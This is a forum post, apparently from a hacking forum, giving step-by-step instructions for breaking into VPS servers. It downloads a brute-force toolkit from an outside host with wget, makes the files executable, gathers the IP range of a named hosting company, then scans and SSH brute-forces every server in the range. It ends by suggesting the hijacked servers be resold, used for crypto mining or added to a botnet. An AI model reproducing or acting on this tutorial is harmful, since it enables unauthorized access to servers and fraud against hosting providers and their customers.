PDA

View Full Version : Hacking VPS Linux



Server_CM
11-28-2014, 08:20 PM
First off all to hack the servers you will need any
of the Linux distros.If you don't have Linux
installed on your PC and you don't want to
change your current OS,you can install Linux in
VM Virtual Box and performe the hack from there
After you have Linux installed start the terminal
and enter this code:
Code:

wget http://www.iphobos.com/hb/unixcod.rar

This command will download a software that will
help us crack the VPS's.To extrack the software
enter this code in the terminal:

Code:

sudo apt-get install unrar

- This code will install the extractor
Code:

unrar e unixcod.rar

- This code will extract the software
After all these done we have to switch to the
unixcod directory and grant the files all
privilege.Enter these comands in the terminal:
Code:

cd unixcod

Code:

chmod 777 *

Ok,now we have our software ready for use.The
next step is getting IP ranges of the hosting
company that we want to hack.I will take
lunarpages.com as example.To get a hosting
company's IP range type this in your web
browser:
https://ipdb.at/org/*hosting-company-here* -
Change *hosting-company-here* with the hosting
company's name.In my case lunarpages.
https://ipdb.at/org/lunarpages
You will see some IP addresses belonging to the
hosting company.Write down the Class B IP
address you see there because this is what we
will need to hack the servers.For example,the
Class B IP address for 123.456.789.1011 is
123.456(the first two octals)
Allright,now we have everything we need.Let's
start hacking!
Enter this command in Linux terminal:
Code:

./unix <class B IP here>

- Replace “<class B IP here>” with the “class B”
IP address we got before.
Now, just wait until the scan finishes. It will
scan the entire IP range, and SSH brute force the
servers.If you successfully hacked the server the
host,username and password of the server will
show up.If nothing shows up means that the
software couldn't hack the server.In this case
pick another IP address and try again until you
succeed.
Now you may ask how you can make profit with
these servers.I will give you a few tips:
1.Resell them.People would buy a VPS for $20
anytime,anywhere.Let's say you hack 300 servers
and you sell them for $20
each.300x20=6000.Yup.$6000!Not bad ehh?
2.Start your own VPN company.When you have
enaugh servers on your hand you can make your
own VPN compnay and sell monthly membership
for around $5.
3.Run a crypto miner on the servers.
4.Infect the servers with your botnet
5.Do all of these at the same time ^
Hope you enjoyed my tutorial and don't forget to
say thanks if you find it useful.It's my first
guide on this forum but many more are on their
way.